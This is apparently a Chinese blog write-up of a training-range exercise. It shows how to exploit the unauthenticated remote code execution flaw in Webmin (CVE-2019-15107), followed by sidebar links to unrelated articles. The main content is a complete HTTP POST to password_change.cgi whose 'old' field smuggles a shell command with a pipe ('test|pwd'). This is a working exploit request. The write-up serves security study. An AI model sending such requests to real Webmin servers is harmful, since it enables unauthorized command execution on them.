当前位置:网站首页>墨者学院-Webmin未经身份验证的远程代码执行
墨者学院-Webmin未经身份验证的远程代码执行
2022-07-04 07:40:00 【Lyswbb】
首先拿到靶场后进行访问,访问后来到一个登陆页面

根据题目可知,未授权的rce,所以可以先找一下历史CVE编号(CVE-2019-15107),找到之后直接对漏洞进行一个复现,漏洞点在密码重置功能出:Webmin--Webmin confuration--Authentication

burp抓取流量包,然后修改参数,注意需要把session_login.cgi改成password_change.cgi,下面的参数直接复制就行,这个漏洞点的触发只需要传一个expired参数执行命令即可
POST /password_change.cgi HTTP/1.1
Host: 124.70.64.48:47372
Cookie: redirect=1; testing=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Origin: https://124.70.64.48:47372
Referer: https://124.70.64.48:47372/session_login.cgi
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
user=dfgfgf&pam=&expired=2&old=test|pwd&new1=test2&new2=test2
直接查询根下的key.txt即可

边栏推荐
- The cloud native programming challenge ended, and Alibaba cloud launched the first white paper on application liveliness technology in the field of cloud native
- Valentine's Day is coming! Without 50W bride price, my girlfriend was forcibly dragged away...
- Zhanrui tankbang | jointly build, cooperate and win-win zhanrui core ecology
- BasicVSR++: Improving Video Super-Resolutionwith Enhanced Propagation and Alignment
- L1-028 judging prime number (10 points)
- Experience installing VMware esxi 6.7 under VMware Workstation 16
- "Sword finger offer" 2nd Edition - force button brush question
- Pangu open source: multi support and promotion, the wave of chip industry
- tornado项目之路由装饰器
- How to send mail with Jianmu Ci
猜你喜欢

Rhcsa day 3

JVM -- class loading process and runtime data area

果果带你写链表,小学生看了都说好
![[kubernetes series] kubesphere is installed on kubernetes](/img/2b/eb39cf78b3bb9908b01f279e2f9958.png)
[kubernetes series] kubesphere is installed on kubernetes

Zephyr learning notes 1, threads

Summary of MySQL common judgment functions!! Have you used it

【Kubernetes系列】Kubernetes 上安装 KubeSphere

Xcode 14之大变化详细介绍

Flask 常用组件

Distributed transaction management DTM: the little helper behind "buy buy buy"
随机推荐
谷歌官方回应:我们没有放弃TensorFlow,未来与JAX并肩发展
How to reset IntelliSense in vs Code- How to reset intellisense in VS Code?
Adaptive spatiotemporal fusion of multi-target networks for compressed video perception enhancement
提升复杂场景三维重建精度 | 基于PaddleSeg分割无人机遥感影像
Flask 常用组件
Xcode 14之大变化详细介绍
Node foundation ~ node operation
Zephyr Learning note 2, Scheduling
When JDBC connects to es query, is there a God who meets the following situation?
How to write a summary of the work to promote the implementation of OKR?
[Gurobi] 简单模型的建立
SQL注入测试工具之Sqli-labs下载安装重置数据库报错解决办法之一(#0{main}thrown in D:\Software\phpstudy_pro\WWW\sqli-labs-……)
Basic DOS commands
This article is enough for learning advanced mysql
Mysql database - function constraint multi table query transaction
BibTex中参考文献种类
Introduction to sap commerce cloud B2B organization function
Comparison between applet framework and platform compilation
Label management of kubernetes cluster
[FreeRTOS] FreeRTOS learning notes (7) - handwritten FreeRTOS two-way linked list / source code analysis